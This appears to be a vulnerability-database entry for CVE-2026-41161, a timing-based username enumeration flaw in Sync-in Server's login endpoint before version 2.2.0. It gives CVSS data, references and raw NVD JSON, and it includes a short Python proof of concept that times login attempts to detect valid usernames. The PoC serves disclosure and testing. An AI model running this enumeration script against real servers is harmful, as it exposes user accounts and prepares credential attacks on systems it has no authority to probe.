CVE-2026-41161

Description

Sync-in Server is a secure, open-source platform for file storage, sharing, collaboration, and syncing. Prior to version 2.2.0, the /api/auth/login endpoint contains a logic flaw that allows unauthenticated remote attackers to enumerate valid usernames by measuring the application's response time. This issue has been patched in version 2.2.0.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:sync-in:sync-in_server:*:*:*:*:*:*:*:* - VULNERABLE

Sync-in Server < 2.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import time

def check_username(url, username):
    """Check if a username exists by measuring response time."""
    target = f"{url}/api/auth/login"
    payload = {
        "username": username,
        "password": "dummy_password" # Use a fixed incorrect password
    }
    
    headers = {
        "Content-Type": "application/json"
    }

    try:
        start_time = time.time()
        response = requests.post(target, json=payload, headers=headers, timeout=5)
        elapsed_time = time.time() - start_time
        
        # Threshold may vary based on network conditions (e.g., 200ms)
        if elapsed_time > 0.2:
            return True, elapsed_time
        else:
            return False, elapsed_time
            
    except Exception as e:
        print(f"Error: {e}")
        return None, 0

if __name__ == "__main__":
    target_url = "http://example.com"
    user_list = ["admin", "root", "test", "guest"]
    
    for user in user_list:
        exists, duration = check_username(target_url, user)
        if exists:
            print(f"[+] Found User: {user} (Response: {duration:.4f}s)")
        else:
            print(f"[-] Not Found: {user} (Response: {duration:.4f}s)")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41161
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41161
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41161/
[4] VulDB https://vuldb.com/cve/CVE-2026-41161
[5] https://github.com/Sync-in/server/releases/tag/v2.2.0
[6] https://github.com/Sync-in/server/security/advisories/GHSA-43fj-qp3h-hrh5
[7] https://github.com/Sync-in/server/security/advisories/GHSA-43fj-qp3h-hrh5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41161", "sourceIdentifier": "[email protected]", "published": "2026-05-08T14:16:33.093", "lastModified": "2026-05-12T15:00:33.713", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sync-in Server is a secure, open-source platform for file storage, sharing, collaboration, and syncing. Prior to version 2.2.0, the /api/auth/login endpoint contains a logic flaw that allows unauthenticated remote attackers to enumerate valid usernames by measuring the application's response time. This issue has been patched in version 2.2.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-208"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sync-in:sync-in_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.0", "matchCriteriaId": "B5BFE291-F06A-4192-AE04-F5366BB3288C"}]}]}], "references": [{"url": "https://github.com/Sync-in/server/releases/tag/v2.2.0", "source": "[email protected]", "tags": ["Patch", "Product"]}, {"url": "https://github.com/Sync-in/server/security/advisories/GHSA-43fj-qp3h-hrh5", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/Sync-in/server/security/advisories/GHSA-43fj-qp3h-hrh5", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory"]}]}}